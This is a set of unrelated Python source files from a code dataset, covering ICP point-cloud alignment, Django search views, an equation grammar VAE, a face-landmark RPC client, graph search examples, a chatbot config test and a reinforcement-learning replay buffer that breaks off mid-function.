Dataset schema: id (string, length 1 to 265); text (string, length 6 to 5.19M); dataset_id (string, 7 classes)
1645162
'''
[ASCII-art banner]

DFAB 2016/17

Created on 22.03.2017

@author: rustr
'''

import numpy as np
from scipy.spatial.distance import cdist


def best_fit_transform(A, B):
    '''
    Calculates the least-squares best-fit transform between corresponding 3D points A->B
    Input:
        A: Nx3 numpy array of corresponding 3D points
        B: Nx3 numpy array of corresponding 3D points
    Returns:
        T: 4x4 homogeneous transformation matrix
        R: 3x3 rotation matrix
        t: 3x1 column vector
    '''

    assert len(A) == len(B)

    # translate points to their centroids
    centroid_A = np.mean(A, axis=0)
    centroid_B = np.mean(B, axis=0)
    AA = A - centroid_A
    BB = B - centroid_B

    # rotation matrix
    H = np.dot(AA.T, BB)
    U, S, Vt = np.linalg.svd(H)
    R = np.dot(Vt.T, U.T)

    # special reflection case
    if np.linalg.det(R) < 0:
        Vt[2, :] *= -1
        R = np.dot(Vt.T, U.T)

    # translation
    t = centroid_B.T - np.dot(R, centroid_A.T)

    # homogeneous transformation
    T = np.identity(4)
    T[0:3, 0:3] = R
    T[0:3, 3] = t

    return T, R, t


def nearest_neighbor(src, dst):
    '''
    Find the nearest (Euclidean) neighbor in dst for each point in src
    Input:
        src: Nx3 array of points
        dst: Nx3 array of points
    Output:
        distances: Euclidean distances of the nearest neighbor
        indices: dst indices of the nearest neighbor
    '''

    all_dists = cdist(src, dst, 'euclidean')
    indices = all_dists.argmin(axis=1)
    distances = all_dists[np.arange(all_dists.shape[0]), indices]
    return distances, indices


def icp(A, B, init_guess=None, max_iterations=20, tolerance=0.001):
    '''
    The Iterative Closest Point method
    Input:
        A: Nx3 numpy array of source 3D points
        B: Nx3 numpy array of destination 3D point
        init_guess: 4x4 homogeneous transformation
        max_iterations: exit algorithm after max_iterations
        tolerance: convergence criteria
    Output:
        T: final homogeneous transformation
        distances: Euclidean distances (errors) of the nearest neighbor

    reference: https://github.com/ClayFlannigan/icp/blob/master/icp.py
    '''

    # make points homogeneous, copy them so as to maintain the originals
    src = np.ones((4, A.shape[0]))
    dst = np.ones((4, B.shape[0]))
    src[0:3, :] = np.copy(A.T)
    dst[0:3, :] = np.copy(B.T)

    # apply the initial pose estimation
    if init_guess is not None:
        src = np.dot(init_guess, src)

    prev_error = 0

    for i in range(max_iterations):
        # find the nearest neighbours between the current source and destination points
        distances, indices = nearest_neighbor(src[0:3, :].T, dst[0:3, :].T)

        # compute the transformation between the current source and nearest destination points
        T, _, _ = best_fit_transform(src[0:3, :].T, dst[0:3, indices].T)

        # update the current source
        src = np.dot(T, src)

        # check error
        mean_error = np.sum(distances) / distances.size
        if abs(prev_error - mean_error) < tolerance:
            break
        prev_error = mean_error

    # calculate final transformation
    T, _, _ = best_fit_transform(A, src[0:3, :].T)

    return T, distances


if __name__ == "__main__":

    #dataA = [[-36.135, -1273.399, 8.321], [0.0, 0.0, 0.0], [49.187, -874.668, 8.534000000000001], [106.173, -468.376, 8.750999999999999], [133.328, -1251.509, 5.334], [217.033, -842.73, 5.553], [270.129, -420.269, 5.778], [499.999, -0.017999999999999999, 0.0040000000000000001]]
    #dataB = [[1014.74, -590.91, -767.45], [1092.76, -743.6, -770.22], [1420.28, -537.33, -767.88], [1507.31, -685.55, -770.85], [1823.42, -454.48, -768.71], [1924.34, -593.59, -771.24], [2229.307, -198.723, -777.062], [2398.372, -669.331, -777.991]]

    dataB = [[217.065, -842.72, 6.0], [133.375, -1251.501, 6.0], [33.678, -1648.955, 6.0], [-202.497, -1524.802, 9.0], [-133.45, -1250.583, 9.0], [-49.337, -857.741, 9.0]]
    dataA = [[24.742, -1652.137, 0.443], [-211.224, -1529.061, 3.78], [-141.752, -1253.421, 3.667], [125.177, -1253.606, 0.60599999999999998], [209.802, -843.907, 1.881], [-57.661, -858.78, 4.697]]

    A = np.array(dataA)
    B = np.array(dataB)

    print(A.shape)
    print(B.shape)
    print()

    init_guess = np.array([[0.4383711467890774, 0.89879404629916704, 0.0, 2026.0682179097259],
                           [-0.89879404629916704, 0.4383711467890774, 0.0, 567.64015907666817],
                           [0.0, 0.0, 1.0, 0.0],
                           [0.0, 0.0, 0.0, 1.0]])

    # Run the icp
    #T, distances = icp(A, B, init_guess, max_iterations=20)
    T, distances = icp(A, B)

    # for pasting into Rhino
    print("T = rg.Transform.Identity")
    for i in range(4):
        for j in range(4):
            print("T.M%i%i = %f" % (i, j, T[i, j]))
    print()
    print(T)
    print(distances)
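A minimal usage sketch for the icp function above, run on synthetic data; the rotation angle, translation, and point count are illustrative assumptions, not values from the original script:

import numpy as np

# build a toy source cloud and a rigidly transformed copy of it
theta = np.deg2rad(30.0)                      # assumed test angle
R = np.array([[np.cos(theta), -np.sin(theta), 0.0],
              [np.sin(theta),  np.cos(theta), 0.0],
              [0.0,            0.0,           1.0]])
t = np.array([1.0, -2.0, 0.5])

A = np.random.rand(50, 3)     # source points
B = np.dot(A, R.T) + t        # destination points

T, distances = icp(A, B, max_iterations=50, tolerance=1e-6)
print(T)                  # approximates the 4x4 transform built from R and t
print(distances.mean())   # should be close to zero on noise-free data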
StarcoderdataPython
101807
<gh_stars>1-10
from operator import itemgetter

from django.shortcuts import render
from django.contrib.postgres.search import SearchVector

from activities.models import Activity, MetadataOption, ActivityTranslation
from .forms import SearchForm


def _pimp_facets(facets):
    # create a cache of MetadataOption
    options = {}
    for obj in MetadataOption.objects.all():
        options[(obj.code, obj.group)] = (obj.code, obj.title, obj.position)

    # go through the search result facets, to sort them and add the title
    for facet, values in facets['fields'].items():
        if facet != 'keywords':
            new_values = []
            for code, count in values:
                # obj = MetadataOption.objects.get(code=code, group=facet)
                # new_values.append((code, obj.title, count, obj.position))
                opt = options[(code, facet)]
                new_values.append((code, opt[1], count, opt[2]))
            # sort by the position field
            facets['fields'][facet] = sorted(new_values, key=itemgetter(3))
    return facets


def simplesearch(request):
    form = SearchForm(request.GET)
    if form.is_valid():
        search_query = form.cleaned_data['q']
        search_result = ActivityTranslation.objects.annotate(
            search=SearchVector('title', 'description', 'keywords')
        ).filter(search=search_query)
        context = {
            'query': search_query,
            'page': {'object_list': search_result},
            'request': request,
            'form': form,
        }
    else:
        context = {
            'request': request,
            'form': form,
        }
    if 'page' not in context or not context['page']['object_list']:
        context['featured'] = Activity.objects.featured().active_translations()[0:3]
    return render(request, 'search/simplesearch.html', context)


def search(request):
    form = SearchForm(request.GET)
    if form.is_valid():
        search_query = form.cleaned_data['q']
        # NOTE: whoosh_utils is referenced here but never imported in this module
        search_result = whoosh_utils.search(search_query, request.LANGUAGE_CODE,
                                            queryfacets=form.cleaned_data)
        context = {
            'query': search_query,
            'facets': _pimp_facets(search_result['facets']),
            'page': {'object_list': search_result['results']},
            'request': request,
            'form': form,
        }
    else:
        context = {
            'request': request,
            'form': form,
        }
    if 'page' not in context or not context['page']['object_list']:
        context['featured'] = Activity.objects.featured().active_translations()[0:3]
    return render(request, 'search/search.html', context)
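_pimp_facets reshapes each facet's (code, count) pairs into (code, title, count, position) tuples sorted by position. A self-contained sketch of that transformation on made-up data (codes, titles, and positions are invented for illustration):

from operator import itemgetter

values = [('a1', 12), ('a2', 7)]                    # facet values as (code, count)
options = {('a1', 'age'): ('a1', 'Under 6', 2),     # cache: (code, title, position)
           ('a2', 'age'): ('a2', '6-10', 1)}

new_values = [(code, options[(code, 'age')][1], count, options[(code, 'age')][2])
              for code, count in values]
print(sorted(new_values, key=itemgetter(3)))
# [('a2', '6-10', 7, 1), ('a1', 'Under 6', 12, 2)]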
StarcoderdataPython
4806320
<gh_stars>10-100
import re
import nltk
import collections
import numpy as np

from weighted_retraining.expr import eq_grammar, expr_model


def tokenize(s):
    funcs = ['sin', 'exp']
    for fn in funcs:
        s = s.replace(fn + '(', fn + ' ')
    s = re.sub(r'([^a-z ])', r' \1 ', s)
    for fn in funcs:
        s = s.replace(fn, fn + '(')
    return s.split()


def pop_or_nothing(S):
    try:
        return S.pop()
    except:
        return 'Nothing'


def prods_to_eq(prods):
    seq = [prods[0].lhs()]
    for prod in prods:
        if str(prod.lhs()) == 'Nothing':
            break
        for ix, s in enumerate(seq):
            if s == prod.lhs():
                seq = seq[:ix] + list(prod.rhs()) + seq[ix + 1:]
                break
    try:
        return ''.join(seq)
    except:
        return ''


def string_to_one_hot(x_str, data_map, n_entries, max_len):
    """ convert string representation to one-hot representation """
    indices = [np.array([data_map[e] for e in entry], dtype=int) for entry in x_str]
    one_hot = np.zeros((len(indices), max_len, n_entries), dtype=np.float32)
    for i in range(len(indices)):
        num_productions = len(indices[i])
        one_hot[i][np.arange(num_productions), indices[i]] = 1.
        one_hot[i][np.arange(num_productions, max_len), -1] = 1.
    return one_hot


class EquationGrammarModel(object):

    def __init__(self, weights_file, latent_rep_size=25):
        """ Load the (trained) equation encoder/decoder, grammar model. """
        self._grammar = eq_grammar
        self._model = expr_model
        self.MAX_LEN = 15
        self._productions = self._grammar.GCFG.productions()
        self._prod_map = {}
        for ix, prod in enumerate(self._productions):
            self._prod_map[prod] = ix
        self._parser = nltk.ChartParser(self._grammar.GCFG)
        self._tokenize = tokenize
        self._n_chars = len(self._productions)
        self._lhs_map = {}
        for ix, lhs in enumerate(self._grammar.lhs_list):
            self._lhs_map[lhs] = ix
        self.vae = self._model.EquationVAE()
        self.vae.load(self._productions, weights_file, max_length=self.MAX_LEN,
                      latent_rep_size=latent_rep_size)

    def encode(self, smiles):
        """ Encode a list of smiles strings into the latent space """
        one_hot = self.smiles_to_one_hot(smiles)
        self.one_hot = one_hot
        return self.vae.encoderMV.predict(one_hot)[0]

    def smiles_to_one_hot(self, smiles):
        """ convert smiles to one-hot vectors """
        assert type(smiles) == list
        tokens = list(map(self._tokenize, smiles))
        parse_trees = [next(self._parser.parse(t)) for t in tokens]
        productions_seq = [tree.productions() for tree in parse_trees]
        return string_to_one_hot(productions_seq, self._prod_map, self._n_chars, self.MAX_LEN)

    def _sample_using_masks(self, unmasked):
        """ Samples a one-hot vector, masking at each timestep.
            This is an implementation of Algorithm ? in the paper. """
        eps = 1e-100
        X_hat = np.zeros_like(unmasked)

        # Create a stack for each input in the batch
        S = np.empty((unmasked.shape[0],), dtype=object)
        for ix in range(S.shape[0]):
            S[ix] = [str(self._grammar.start_index)]

        # Loop over time axis, sampling values and updating masks
        for t in range(unmasked.shape[1]):
            next_nonterminal = [self._lhs_map[pop_or_nothing(a)] for a in S]
            mask = self._grammar.masks[next_nonterminal]
            masked_output = np.exp(unmasked[:, t, :]) * mask + eps
            sampled_output = np.argmax(np.random.gumbel(
                size=masked_output.shape) + np.log(masked_output), axis=-1)
            X_hat[np.arange(unmasked.shape[0]), t, sampled_output] = 1.0

            # Identify non-terminals in RHS of selected production, and
            # push them onto the stack in reverse order
            rhs = [[a for a in self._productions[i].rhs()
                    if (type(a) == nltk.grammar.Nonterminal) and (str(a) != 'None')]
                   for i in sampled_output]
            for ix in range(S.shape[0]):
                S[ix].extend(list(map(str, rhs[ix]))[::-1])
        return X_hat  # , ln_p

    def decode(self, z):
        """ Sample from the grammar decoder """
        assert z.ndim == 2
        unmasked = self.vae.decoder.predict(z)
        X_hat = self._sample_using_masks(unmasked)
        # Convert from one-hot to sequence of production rules
        prod_seq = [[self._productions[X_hat[index, t].argmax()]
                     for t in range(X_hat.shape[1])]
                    for index in range(X_hat.shape[0])]
        return [prods_to_eq(prods) for prods in prod_seq]

    def decode_from_latent_space(self, zs, n_decode_attempts=1):
        """ decode from latents to inputs and set all invalid inputs to None """
        # decode equations and replace all empty ones (i.e. '') by None
        decoded_equations = [self.decode(zs) for _ in range(n_decode_attempts)]
        valid_equations = []
        for i in range(n_decode_attempts):
            valid_equations.append([])
            for j in range(zs.shape[0]):
                eq = np.array([decoded_equations[i][j]]).astype('str')[0]
                valid_equations[i].append(None if eq == '' else eq)

        # if the different decoding attempts yielded different equations, pick the majority
        valid_equations = np.array(valid_equations)
        final_equations = []
        for i in range(zs.shape[0]):
            aux = collections.Counter(
                valid_equations[~np.equal(valid_equations[:, i], None), i])
            eq = list(aux.items())[np.argmax(list(aux.values()))][0] if len(aux) > 0 else None
            final_equations.append(eq)
        return np.array(final_equations)
StarcoderdataPython
3263828
import jsonrpcclient
import sys
import os
import argparse
import base64

from services import registry
from .snet import snet_setup


def main():
    script_name = sys.argv[0]
    parser = argparse.ArgumentParser(prog=script_name)
    server_name = "_".join(os.path.splitext(os.path.basename(script_name))[0].split('_')[:2]) + "_server"
    default_endpoint = "http://127.0.0.1:{}".format(registry[server_name]['jsonrpc'])
    parser.add_argument("--endpoint", help="jsonrpc server to connect to", default=default_endpoint,
                        type=str, required=False)
    parser.add_argument("--snet", help="call service on SingularityNet - requires configured snet CLI",
                        action='store_true')
    parser.add_argument("--image", help="path to image to apply face landmark prediction on",
                        type=str, required=True)
    parser.add_argument("--model", help="face landmark algorithm to request",
                        type=str, action='store', choices=['5', '68'])
    parser.add_argument("--out-image", help="Render landmarks on image and save",
                        type=str, required=False)
    parser.add_argument("--face-bb", help='Specify face bounding box in "x,y,w,h" format',
                        type=str, required=True, action='append')
    args = parser.parse_args(sys.argv[1:])

    with open(args.image, "rb") as f:
        img_base64 = base64.b64encode(f.read()).decode('ascii')

    endpoint = args.endpoint

    bboxes = []
    for b in args.face_bb:
        b = [int(x) for x in b.split(',')]
        assert len(b) == 4
        bboxes.append(dict(x=b[0], y=b[1], w=b[2], h=b[3]))

    params = {'landmark_model': args.model, "image": img_base64, "face_bboxes": bboxes}
    if args.snet:
        endpoint, job_address, job_signature = snet_setup(service_name="face_landmarks")
        params['job_address'] = job_address
        params['job_signature'] = job_signature

    response = jsonrpcclient.request(endpoint, "get_landmarks", **params)

    if args.out_image:
        import cv2
        import numpy as np
        print("Rendering landmarks and saving to {}".format(args.out_image))
        image = cv2.imread(args.image)
        for l in response['landmarks']:
            landmarks = np.matrix([[p['x'], p['y']] for p in l['points']])
            for idx, point in enumerate(landmarks):
                pos = (point[0, 0], point[0, 1])
                # annotate the positions
                cv2.putText(image, str(idx), pos,
                            fontFace=cv2.FONT_HERSHEY_SIMPLEX,
                            fontScale=0.4,
                            color=(0, 0, 255))
                # draw points on the landmark positions
                cv2.circle(image, pos, 3, color=(0, 255, 255))
        cv2.imwrite(args.out_image, image)


if __name__ == '__main__':
    main()
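A hypothetical invocation of this client; the endpoint port, file name, and box coordinates are placeholders, and the snippet simply mirrors the request the script builds:

# python face_landmarks_client.py --image face.jpg --model 68 --face-bb "10,20,200,200"
# is roughly equivalent to:
import base64
import jsonrpcclient

with open("face.jpg", "rb") as f:
    img_base64 = base64.b64encode(f.read()).decode('ascii')

params = {'landmark_model': '68', 'image': img_base64,
          'face_bboxes': [{'x': 10, 'y': 20, 'w': 200, 'h': 200}]}
response = jsonrpcclient.request("http://127.0.0.1:8001", "get_landmarks", **params)
print(response['landmarks'])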
StarcoderdataPython
129084
# -*- coding: utf-8 -*-
"""
@author: 2series
"""

class Node(object):
    def __init__(self, name):
        """Assumes name is a string"""
        self.name = name
    def getName(self):
        return self.name
    def __str__(self):
        return self.name

class Edge(object):
    def __init__(self, src, dest):
        """Assumes src and dest are nodes"""
        self.src = src
        self.dest = dest
    def getSource(self):
        return self.src
    def getDestination(self):
        return self.dest
    def __str__(self):
        return self.src.getName() + '->' + self.dest.getName()

class Digraph(object):
    """edges is a dict mapping each node to a list of its children"""
    def __init__(self):
        self.edges = {}
    def addNode(self, node):
        if node in self.edges:
            raise ValueError('Duplicate node')
        else:
            self.edges[node] = []
    def addEdge(self, edge):
        src = edge.getSource()
        dest = edge.getDestination()
        if not (src in self.edges and dest in self.edges):
            raise ValueError('Node not in graph')
        self.edges[src].append(dest)
    def childrenOf(self, node):
        return self.edges[node]
    def hasNode(self, node):
        return node in self.edges
    def getNode(self, name):
        for n in self.edges:
            if n.getName() == name:
                return n
        raise NameError(name)
    def __str__(self):
        result = ''
        for src in self.edges:
            for dest in self.edges[src]:
                result = result + src.getName() + '->'\
                         + dest.getName() + '\n'
        return result[:-1]  #omit final newline

class Graph(Digraph):
    def addEdge(self, edge):
        Digraph.addEdge(self, edge)
        rev = Edge(edge.getDestination(), edge.getSource())
        Digraph.addEdge(self, rev)

def buildCityGraph(graphType):
    g = graphType()
    for name in ('Boston', 'Providence', 'New York', 'Chicago',
                 'Denver', 'Phoenix', 'Los Angeles'):  #Create 7 nodes
        g.addNode(Node(name))
    g.addEdge(Edge(g.getNode('Boston'), g.getNode('Providence')))
    g.addEdge(Edge(g.getNode('Boston'), g.getNode('New York')))
    g.addEdge(Edge(g.getNode('Providence'), g.getNode('Boston')))
    g.addEdge(Edge(g.getNode('Providence'), g.getNode('New York')))
    g.addEdge(Edge(g.getNode('New York'), g.getNode('Chicago')))
    g.addEdge(Edge(g.getNode('Chicago'), g.getNode('Phoenix')))
    g.addEdge(Edge(g.getNode('Chicago'), g.getNode('Denver')))
    g.addEdge(Edge(g.getNode('Denver'), g.getNode('Phoenix')))
    g.addEdge(Edge(g.getNode('Denver'), g.getNode('New York')))
    g.addEdge(Edge(g.getNode('Los Angeles'), g.getNode('Boston')))
    return g

def printPath(path):
    """Assumes path is a list of nodes"""
    result = ''
    for i in range(len(path)):
        result = result + str(path[i])
        if i != len(path) - 1:
            result = result + '->'
    return result

def DFS(graph, start, end, path, shortest, toPrint = False):
    """Assumes graph is a Digraph; start and end are nodes;
          path and shortest are lists of nodes
       Returns a shortest path from start to end in graph"""
    path = path + [start]
    if toPrint:
        print('Current DFS path:', printPath(path))
    if start == end:
        return path
    for node in graph.childrenOf(start):
        if node not in path:  #avoid cycles
            if shortest == None or len(path) < len(shortest):
                newPath = DFS(graph, node, end, path, shortest, toPrint)
                if newPath != None:
                    shortest = newPath
        elif toPrint:
            print('Already visited', node)
    return shortest

def shortestPath(graph, start, end, toPrint = False):
    """Assumes graph is a Digraph; start and end are nodes
       Returns a shortest path from start to end in graph"""
    return DFS(graph, start, end, [], None, toPrint)

def testSP(source, destination):
    g = buildCityGraph(Digraph)
    sp = shortestPath(g, g.getNode(source), g.getNode(destination), toPrint = True)
    if sp != None:
        print('Shortest path from', source, 'to', destination, 'is', printPath(sp))
    else:
        print('There is no path from', source, 'to', destination)

#testSP('Chicago', 'Boston')
testSP('Boston', 'Phoenix')

def BFS(graph, start, end, toPrint = False):
    """Assumes graph is a Digraph; start and end are nodes
       Returns a shortest path from start to end in graph"""
    initPath = [start]
    pathQueue = [initPath]
    while len(pathQueue) != 0:
        #Get and remove oldest element in pathQueue
        tmpPath = pathQueue.pop(0)
        if toPrint:
            print('Current BFS path:', printPath(tmpPath))
        lastNode = tmpPath[-1]
        if lastNode == end:
            return tmpPath
        for nextNode in graph.childrenOf(lastNode):
            if nextNode not in tmpPath:
                newPath = tmpPath + [nextNode]
                pathQueue.append(newPath)
    return None

def shortestPath(graph, start, end, toPrint = False):
    """Assumes graph is a Digraph; start and end are nodes
       Returns a shortest path from start to end in graph"""
    return BFS(graph, start, end, toPrint)

testSP('Boston', 'Phoenix')

#def cost(path):
#    result = 0
#    for i in range(len(path)):
#        result += str(path[i])
#        if i != len(path) - 1:
#            result = result + '->'
#    return result
#
#
#def DFS(graph, start, end, path, shortest, toPrint = False):
#    """Assumes graph is a Digraph; start and end are nodes;
#          path and shortest are tuples containing a list of
#          nodes and a cost
#       Returns a shortest path from start to end in graph"""
#    path = (path + [start], 0)
#    if toPrint:
#        print('Current DFS path:', printPath(path[0]))
#    if start == end:
#        return path
#    for node in graph.childrenOf(start):
#        if node not in path:  #avoid cycles
#            if shortest == None or cost(path) < cost(shortest):
#                newPath = DFS(graph, node, end, path, shortest,
#                              toPrint)
#                if newPath != None:
#                    shortest = newPath
#
#def testSP():
#    nodes = []
#    for name in ('Boston', 'Providence', 'New York', 'Chicago',
#                 'Denver', 'Phoenix', 'Los Angeles'):  #Create 6 nodes
#        nodes.append(Node(str(name)))
#    g = Digraph()
#    for n in nodes:
#        g.addNode(n)
#    g.addEdge(WeightedEdge(nodes[0],nodes[1]))
#    g.addEdge(WeightedEdge(nodes[1],nodes[2]))
#    g.addEdge(WeightedEdge(nodes[2],nodes[3]))
#    g.addEdge(WeightedEdge(nodes[2],nodes[4]))
#    g.addEdge(WeightedEdge(nodes[3],nodes[4]))
#    g.addEdge(WeightedEdge(nodes[3],nodes[5]))
#    g.addEdge(WeightedEdge(nodes[0],nodes[2],10))
#    g.addEdge(WeightedEdge(nodes[1],nodes[0]))
#    g.addEdge(WeightedEdge(nodes[3],nodes[1]))
#    g.addEdge(WeightedEdge(nodes[4],nodes[0]))
#    sp = shortestPath(g, nodes[0], nodes[5], toPrint = True)
#    print('Shortest path is', printPath(sp))
#    sp = BFS(g, nodes[0], nodes[5])
#    print('Shortest path found by BFS:', printPath(sp))
#
#testSP()
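Since the second shortestPath definition shadows the first, the final testSP call runs BFS; a sketch of the result both searches settle on for this graph (the 'Current ... path' trace lines are omitted):

g = buildCityGraph(Digraph)
sp = shortestPath(g, g.getNode('Boston'), g.getNode('Phoenix'))
print(printPath(sp))  # Boston->New York->Chicago->Phoenix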
StarcoderdataPython
4415
""" Copyright (c) 2020 COTOBA DESIGN, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import unittest from programy.config.file.yaml_file import YamlConfigurationFile from programy.config.brain.oob import BrainOOBConfiguration from programy.clients.events.console.config import ConsoleConfiguration class BrainOOBConfigurationTests(unittest.TestCase): def test_oob_with_data(self): yaml = YamlConfigurationFile() self.assertIsNotNone(yaml) yaml.load_from_text(""" brain: oobs: default: classname: programy.oob.defaults.default.DefaultOutOfBandProcessor """, ConsoleConfiguration(), ".") brain_config = yaml.get_section("brain") self.assertIsNotNone(brain_config) oobs_config = yaml.get_section("oobs", brain_config) self.assertIsNotNone(oobs_config) oob_config = BrainOOBConfiguration("default") oob_config.load_config_section(yaml, oobs_config, ".") self.assertEqual("programy.oob.defaults.default.DefaultOutOfBandProcessor", oob_config.classname) def test_default_without_data(self): yaml = YamlConfigurationFile() self.assertIsNotNone(yaml) yaml.load_from_text(""" brain: oobs: default: """, ConsoleConfiguration(), ".") brain_config = yaml.get_section("brain") self.assertIsNotNone(brain_config) oobs_config = yaml.get_section("oobs", brain_config) self.assertIsNotNone(oobs_config) oob_config = BrainOOBConfiguration("default") oob_config.load_config_section(yaml, oobs_config, ".") self.assertIsNone(oob_config.classname)
StarcoderdataPython
3372280
import mrl
import gym
from mrl.replays.core.shared_buffer import SharedMemoryTrajectoryBuffer as Buffer
import numpy as np
import pickle
import os
from mrl.utils.misc import batch_block_diag


class OnlineHERBuffer(mrl.Module):

  def __init__(self, module_name='replay_buffer'):
    """
    Buffer that does online hindsight relabeling.
    Replaces the old combo of ReplayBuffer + HERBuffer.
    """
    super().__init__(module_name, required_agent_modules=['env'], locals=locals())
    self.size = None
    self.goal_space = None
    self.buffer = None
    self.save_buffer = None

  def _setup(self):
    self.size = self.config.replay_size

    env = self.env
    if type(env.observation_space) == gym.spaces.Dict:
      observation_space = env.observation_space.spaces["observation"]
      self.goal_space = env.observation_space.spaces["desired_goal"]
    else:
      observation_space = env.observation_space

    items = [("state", observation_space.shape), ("action", env.action_space.shape),
             ("reward", (1,)), ("next_state", observation_space.shape), ("done", (1,))]

    if self.goal_space is not None:
      items += [("previous_ag", self.goal_space.shape),  # for reward shaping
                ("ag", self.goal_space.shape),  # achieved goal
                ("bg", self.goal_space.shape),  # behavioral goal (i.e., intrinsic if curious agent)
                ("dg", self.goal_space.shape)]  # desired goal (even if ignored behaviorally)

    self.buffer = Buffer(self.size, items)
    self._subbuffers = [[] for _ in range(self.env.num_envs)]
    self.n_envs = self.env.num_envs

    # HER mode can differ if demo or normal replay buffer
    if 'demo' in self.module_name:
      self.fut, self.act, self.ach, self.beh = parse_hindsight_mode(self.config.demo_her)
    else:
      self.fut, self.act, self.ach, self.beh = parse_hindsight_mode(self.config.her)

  def _process_experience(self, exp):
    if getattr(self, 'logger'):
      self.logger.add_tabular('Replay buffer size', len(self.buffer))
    done = np.expand_dims(exp.done, 1)  # format for replay buffer
    reward = np.expand_dims(exp.reward, 1)  # format for replay buffer
    action = exp.action

    if self.goal_space:
      state = exp.state['observation']
      next_state = exp.next_state['observation']
      previous_achieved = exp.state['achieved_goal']
      achieved = exp.next_state['achieved_goal']
      desired = exp.state['desired_goal']
      if hasattr(self, 'ag_curiosity') and self.ag_curiosity.current_goals is not None:
        behavioral = self.ag_curiosity.current_goals
        # recompute online reward
        reward = self.env.compute_reward(achieved, behavioral, {'s': state, 'ns': next_state}).reshape(-1, 1)
      else:
        behavioral = desired
      for i in range(self.n_envs):
        self._subbuffers[i].append([
            state[i], action[i], reward[i], next_state[i], done[i],
            previous_achieved[i], achieved[i], behavioral[i], desired[i]
        ])
    else:
      state = exp.state
      next_state = exp.next_state
      for i in range(self.n_envs):
        self._subbuffers[i].append(
            [state[i], action[i], reward[i], next_state[i], done[i]])

    for i in range(self.n_envs):
      if exp.trajectory_over[i]:
        trajectory = [np.stack(a) for a in zip(*self._subbuffers[i])]
        self.buffer.add_trajectory(*trajectory)
        self._subbuffers[i] = []

  def sample(self, batch_size, to_torch=True):
    if hasattr(self, 'prioritized_replay'):
      batch_idxs = self.prioritized_replay(batch_size)
    else:
      batch_idxs = np.random.randint(self.buffer.size, size=batch_size)

    if self.goal_space:
      if "demo" in self.module_name:
        has_config_her = self.config.get('demo_her')
      else:
        has_config_her = self.config.get('her')

      if has_config_her:
        if self.config.env_steps > self.config.future_warm_up:
          fut_batch_size, act_batch_size, ach_batch_size, beh_batch_size, real_batch_size = np.random.multinomial(
              batch_size, [self.fut, self.act, self.ach, self.beh, 1.])
        else:
          fut_batch_size, act_batch_size, ach_batch_size, beh_batch_size, real_batch_size = batch_size, 0, 0, 0, 0

        fut_idxs, act_idxs, ach_idxs, beh_idxs, real_idxs = np.array_split(
            batch_idxs, np.cumsum([fut_batch_size, act_batch_size, ach_batch_size, beh_batch_size]))

        # Sample the real batch (i.e., goals = behavioral goals)
        states, actions, rewards, next_states, dones, previous_ags, ags, goals, _ =\
            self.buffer.sample(real_batch_size, batch_idxs=real_idxs)

        # Sample the future batch
        states_fut, actions_fut, _, next_states_fut, dones_fut, previous_ags_fut, ags_fut, _, _, goals_fut =\
            self.buffer.sample_future(fut_batch_size, batch_idxs=fut_idxs)

        # Sample the actual batch
        states_act, actions_act, _, next_states_act, dones_act, previous_ags_act, ags_act, _, _, goals_act =\
            self.buffer.sample_from_goal_buffer('dg', act_batch_size, batch_idxs=act_idxs)

        # Sample the achieved batch
        states_ach, actions_ach, _, next_states_ach, dones_ach, previous_ags_ach, ags_ach, _, _, goals_ach =\
            self.buffer.sample_from_goal_buffer('ag', ach_batch_size, batch_idxs=ach_idxs)

        # Sample the behavioral batch
        states_beh, actions_beh, _, next_states_beh, dones_beh, previous_ags_beh, ags_beh, _, _, goals_beh =\
            self.buffer.sample_from_goal_buffer('bg', beh_batch_size, batch_idxs=beh_idxs)

        # Concatenate the five
        states = np.concatenate([states, states_fut, states_act, states_ach, states_beh], 0)
        actions = np.concatenate([actions, actions_fut, actions_act, actions_ach, actions_beh], 0)
        ags = np.concatenate([ags, ags_fut, ags_act, ags_ach, ags_beh], 0)
        goals = np.concatenate([goals, goals_fut, goals_act, goals_ach, goals_beh], 0)
        next_states = np.concatenate([next_states, next_states_fut, next_states_act, next_states_ach, next_states_beh], 0)
        dones = np.concatenate([dones, dones_fut, dones_act, dones_ach, dones_beh], 0)

        # Recompute reward online
        if hasattr(self, 'goal_reward'):
          rewards = self.goal_reward(ags, goals, {'s': states, 'ns': next_states}).reshape(-1, 1).astype(np.float32)
        else:
          rewards = self.env.compute_reward(ags, goals, {'s': states, 'ns': next_states}).reshape(-1, 1).astype(np.float32)

        if self.config.get('never_done'):
          dones = np.zeros_like(rewards, dtype=np.float32)
        elif self.config.get('first_visit_succ'):
          dones = np.round(rewards + 1.)
        else:
          raise ValueError("Never done or first visit succ must be set in goal environments to use HER.")

        if self.config.sparse_reward_shaping:
          previous_ags = np.concatenate([previous_ags, previous_ags_fut, previous_ags_act, previous_ags_ach, previous_ags_beh], 0)
          previous_phi = -np.linalg.norm(previous_ags - goals, axis=1, keepdims=True)
          current_phi = -np.linalg.norm(ags - goals, axis=1, keepdims=True)
          rewards_F = self.config.gamma * current_phi - previous_phi
          rewards += self.config.sparse_reward_shaping * rewards_F

      else:
        # Uses the original desired goals
        states, actions, rewards, next_states, dones, _, _, _, goals =\
            self.buffer.sample(batch_size, batch_idxs=batch_idxs)

      if self.config.slot_based_state:
        # TODO: For now, we flatten according to config.slot_state_dims
        I, J = self.config.slot_state_dims
        states = np.concatenate((states[:, I, J], goals), -1)
        next_states = np.concatenate((next_states[:, I, J], goals), -1)
      else:
        states = np.concatenate((states, goals), -1)
        next_states = np.concatenate((next_states, goals), -1)
      gammas = self.config.gamma * (1. - dones)

